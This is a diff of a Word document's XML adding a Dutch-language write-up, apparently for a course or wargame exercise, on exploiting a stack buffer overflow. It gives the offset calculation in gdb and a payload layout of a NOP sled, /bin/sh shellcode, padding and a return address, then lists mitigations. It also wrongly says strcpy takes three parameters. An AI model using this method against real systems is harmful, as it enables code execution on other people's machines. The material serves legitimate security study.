+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kopiëren</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> naar de buffer. Het is een onveilige functie omdat er niet wordt gekeken of de input langer is dan 999 karakters, hierdoor kan de aanvaller meer karakters geven als input en zo het return adres overschrijven</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (of zelfs verder)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Deze aanval is mogelijk omdat het geen gebruik maakt van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en de stack is uitvoerbaar.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="5" w:name="_Toc25519923"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exploit </w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Om deze exploit uit te voeren, moeten we eerst weten hoeveel bytes er overschreven moeten worden om zo het return adres te overschrijven. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Als allereerst beginnen we met de totale lengte van de buffer te berekenen, deze is niet exact gelijk aan 999 bytes. We kunnen dit op de volgende manier berekenen met </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>beschrijving</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Door het commando </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>disassemble</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">uit te voeren in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Dit geeft de range van memory als machine instructies</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> terug</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. We zien hierin “0x3ef” staan, in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">het </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">decimaal </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stelsel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wil dit zeggen dat er 1007 bytes zijn.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Een alternatieve methode is om </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">het programma uit te voeren met een breakpoint in de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> methode en hierin het adres van de buffer (p &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>) en het adres van base pointer (p $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ebp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>) op te vragen. Deze zijn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bij een invoer van 1000 karakters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> respectievelijk: 0xbfffee59 en 0xbffff248. Als we deze van elkaar aftrekken geeft dit in het decimaal stelsel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1007.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Uit bovenstaande berekening weten we dat de buffer een grootte heeft van 1007 bytes. Hierbij moeten we nog eens 8 bytes optellen. Deze 8 bytes bestaat uit 4 bytes voor de base pointer en 4 bytes voor het eigenlijke return adres. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>In totaal moeten er dus 1015 bytes overschreven worden.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In deze aanval gaat de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>buffer overschreven worden met uitvoerbare code en het nieuwe return adres gaat hiernaar verwijzen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>De 1015 bytes invoer ziet er als</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>volgt uit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>900 NOP bytes (“x90”)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>21 bytes shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>90 bytes voor opvulling tot het return adres</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>4 bytes voor het eigenlijke adres</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De eerste 900 bytes bestaan NOP operaties, dit staat voor: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>null</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>operation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Het maakt deze aanval makkelijker omdat mijn eigen overschreven return adres niet moet verwijzen naar de exacte locatie van de shell code. Het kan nu verwijzen naar een locatie in het begin van de buffer (in de NOP range). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze NOP instructies worden gevolgd door de 21 bytes shellcode die </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gaan uitvoeren. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze shell code is een variant van de 21 bytes shellcode door </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kernel_panik</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, beschreven in het extra materiaal op de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ca</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>sp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>er</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wargame</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> website. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Het enige verschil met deze code is dat het gebruik maakt van /bin/sh in plaats van /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vervolgens gaan er 90 bytes geschreven worden aan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>opvulling</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> om tot aan het return adres te komen. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Tot slot wordt er een adres van 4 bytes geschreven die verwijst naar een locatie in het begin van de buffer (in de NOP range).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
@@ -1787,8 +2762,341 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze aanval kan op v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">erschillende manieren </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>worden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gemitigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De implementatie van de c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ode kan aangepast worden door gebruik maakt van de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">functie met 3 parameters. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>programma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is het maximum gelijk aan 999 karakters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een tweede manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>oor gebruik te maken van een niet uitvoerbare stack. Hierdoor kan het returnadres nog steeds overschreven worden maar de code kan niet uitgevoerd worden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in de stack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een derde manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>y</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is een g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">eheim die geplaatst is op de stack en dewelke verandert </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">telkens </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">het programma uitgevoerd wordt. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Als de stack overschreven wordt gaat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functie return gaat gekeken worden of de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aangepast werd, als dit het geval is stop het programma onmiddellijk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een vierde mitigatie is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Space </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Layout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1811,19 +3119,85 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
